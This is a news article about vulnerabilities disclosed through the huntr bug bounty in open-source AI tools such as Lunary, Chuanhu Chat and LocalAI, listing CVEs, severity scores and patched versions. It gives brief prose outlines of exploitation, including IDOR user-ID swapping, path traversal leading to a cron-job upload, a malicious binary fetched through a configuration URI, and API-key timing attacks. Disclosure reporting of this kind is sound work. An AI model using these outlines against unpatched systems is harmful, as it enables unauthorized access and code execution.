AI bug bounty program yields 34 flaws in open-source tools – Go Health Pro

Nearly three dozen flaws in open-source AI and machine learning (ML) tools were disclosed Tuesday as part of Protect AI’s huntr bug bounty program.

The discoveries include three critical vulnerabilities: two in the Lunary AI developer toolkit and one in a graphical user interface (GUI) for ChatGPT called Chuanhu Chat. The October vulnerability report also includes 18 high-severity flaws ranging from denial-of-service (DoS) to remote code execution (RCE).

“Through our own research and the huntr community, we’ve found the tools used in the supply chain to build the machine learning models that power AI applications to be vulnerable to unique security threats,” stated Protect AI Security Researchers Dan McInerney and Marcello Salvati. “These tools are Open Souce and downloaded thousands of times a month to build enterprise AI Systems.”

Protect AI’s report also highlights vulnerabilities in LocalAI, a platform for running AI models locally on consumer-grade hardware, LoLLMs, a web UI for various AI systems, LangChain.js, a framework for developing language model applications, and more.

Lunary AI flaws risk manipulation of authentication, external users

Two of the most severe vulnerabilities disclosed Tuesday through the huntr program are flaws in the Lunary AI production toolkit for developers of large language model (LLM) chatbots. The open-source toolkit is used by “2500+ AI developers at top companies,” according to the Lunary AI website.

The flaws are tracked as CVE-2024-7474 and CVE-2024-7475, and both have a CVSS score of 9.1.

CVE-2024-7474 is an insecure direct object reference (IDOR) flaw that could allow an authenticated user to view or delete the user records of any other external user due to lack of proper access control checks for requests to the relevant API endpoints. If the attacker knows another user’s user ID, they can replace their own user ID with the victim’s when calling these API endpoints, which enables them to view and delete user records as though they were their own.

CVE-2024-7475 is also due to improper access control, this time with regard to requests to the Security Assertion Markup Language (SAML) configuration endpoint. This flaw enables attackers to user crafted POST requests to this endpoint to maliciously update the SAML configuration, which can lead to manipulation of authentication processes and potentially fraudulent logins.

Both flaws were addressed by Lunary and can be fixed by upgrading to Lunary version 1.3.4.

Chuanhu Chat, LocalAI flaws could lead to RCE, data leakage

An additional critical flaw disclosed in Protect AI’s report Tuesday is a path traversal vulnerability in the user upload feature of Chuahu Chat, which could enable RCE, arbitrary directory creation and leakage of information from CSV files due to improper sanitization of certain inputs. The flaw is tracked as CVE-2024-5982 and has a CVSS score of 9.1.

CVE-2024-5982 can be exploited to achieve RCE by creating a user with a name that includes an absolute path and then uploading a file with a cron job configuration through the Chuahu Chat interface. Additional modified user requests can also be used to create arbitrary directories through the “get_history_names” function and leak the first columns of CSV files through the “load_template” function, Protect AI reports.

The Chuanhu Chat project has more than 15,200 stars and 2,300 forks on GitHub. CVE-2024-5982 was fixed in Chuanhu Chat version 20240918.

LocalAI is another popular open-source AI project on GitHub with more than 24,000 stars and 1,900 forks. The huntr community discovered multiple vulnerabilities in the platform, including an RCE flaw tracked as CVE-2024-6983 and timing attack vulnerability tracked as CVE-2024-7010.

CVE-2024-6983, which has a CVSS score of 8.8, enables an attacker to upload a malicious configuration file with a uniform resource identifier (URI) that points to a malicious binary hosted on an attacker-controlled server. The binary is then executed when the configuration file is processed on the target system.

CVE-2024-7010, CVSS score 7.5, can enable a timing attack, which is a type of side-channel attack that measures the response time of a server when processing an API key. If an attacker were to set up a script that sends multiple API key guesses to the server and records the response times for each key, they could eventually predict the correct key to gain unauthorized access.

CVE-2024-6983 can be patched by upgrading to LocalAI version 2.19.4, while fixing CVE-2024-7010 requires an upgrade to version 2.21.

Leave a Comment

x